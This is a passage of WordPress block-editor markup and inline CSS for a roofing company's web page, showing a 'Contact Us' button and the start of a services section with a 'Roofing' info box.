style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"Contact Us\",\"link\":\"https://dunriteroof.com/contact us\",\"counterId\":\"3d60bfc1-b9eb-4ec8-9435-1256841854bd\",\"vPadding\":13,\"hPadding\":27,\"vMargin\":20,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 20px !important; margin-bottom: 20px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 13px; padding-bottom: 13px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 27px; padding-right: 27px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://dunriteroof.com/contact us\" rel=\"noopener noreferrer\" target=\"_blank\">Contact Us</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"056cb894-6454-42df-942f-dfc188516e3c\",\"topPadding\":50,\"topPaddingMobile\":30,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"className\":\"gb-renovation-services\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services skt-blocks-block-section-outer-wrap block-056cb894-6454-42df-942f-dfc188516e3c background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-056cb894-6454-42df-942f-dfc188516e3c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-056cb894-6454-42df-942f-dfc188516e3c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 30px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-056cb894-6454-42df-942f-dfc188516e3c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-056cb894-6454-42df-942f-dfc188516e3c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-056cb894-6454-42df-942f-dfc188516e3c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-056cb894-6454-42df-942f-dfc188516e3c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-056cb894-6454-42df-942f-dfc188516e3c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-056cb894-6454-42df-942f-dfc188516e3c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-056cb894-6454-42df-942f-dfc188516e3c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-056cb894-6454-42df-942f-dfc188516e3c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-056cb894-6454-42df-942f-dfc188516e3c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-056cb894-6454-42df-942f-dfc188516e3c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-056cb894-6454-42df-942f-dfc188516e3c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-056cb894-6454-42df-942f-dfc188516e3c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-056cb894-6454-42df-942f-dfc188516e3c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":3,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"50e69a29-82aa-4d9a-8393-5d7206f14a34\"} -->\n<style type=\"text/css\"> .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-50e69a29-82aa-4d9a-8393-5d7206f14a34 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-3\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"8084ee78-5871-48ad-a7a9-1e3b52164921\",\"blockBorderRadius\":5,\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-8084ee78-5871-48ad-a7a9-1e3b52164921 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-8084ee78-5871-48ad-a7a9-1e3b52164921 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-8084ee78-5871-48ad-a7a9-1e3b52164921 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-8084ee78-5871-48ad-a7a9-1e3b52164921 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-8084ee78-5871-48ad-a7a9-1e3b52164921 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-8084ee78-5871-48ad-a7a9-1e3b52164921\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadingTag\":\"h4\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/roofing/\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"uploading\":false,\"date\":1622180355000,\"filename\":\"roofing.jpg\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"jpeg\",\"id\":259,\"title\":\"roofing\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/home/roofing-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"roofing-2\",\"status\":\"inherit\",\"modified\":1622180355000,\"mime\":\"image/jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 28, 2021\",\"nonces\":{\"update\":\"5f56d3c42c\",\"delete\":\"aef82b5b03\",\"edit\":\"25a8bb0d07\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=259u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":7947,\"filesizeHumanReadable\":\"8 KB\",\"context\":\"\",\"height\":65,\"width\":88,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\",\"height\":65,\"width\":88,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":88,\"resshowPrefix\":false,\"counterId\":\"dd2fb7db-992d-423c-ac16-d676e4901ec9\"} -->\n<style type=\"text/css\"> .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-image-content img {\n width: 88px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h4 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Roofing</h4></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Never worry again with a new roof replacement from Dunrite.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/roofing/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#333;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#333\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"02734963-0b31-4312-8c71-a66457a80c8b\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-02734963-0b31-4312-8c71-a66457a80c8b .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-02734963-0b31-4312-8c71-a66457a80c8b .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-02734963-0b31-4312-8c71-a66457a80c8b .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-02734963-0b31-4312-8c71-a66457a80c8b .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-02734963-0b31-4312-8c71-a66457a80c8b .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-02734963-0b31-4312-8c71-a66457a80c8b\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/tiling/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":28,\"title\":\"services-img2\",\"filename\":\"services-img2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8af869eca5\",\"delete\":\"667bc07c15\",\"edit\":\"3755558faf\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=28u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":3796,\"filesizeHumanReadable\":\"4 KB\",\"context\":\"\",\"height\":65,\"width\":77,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\",\"height\":65,\"width\":77,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":77,\"resshowPrefix\":false,\"counterId\":\"180058dd-db27-45c4-a0de-f8703e853737\"} -->\n<style type=\"text/css\"> .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-image-content img {\n width: 77px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content 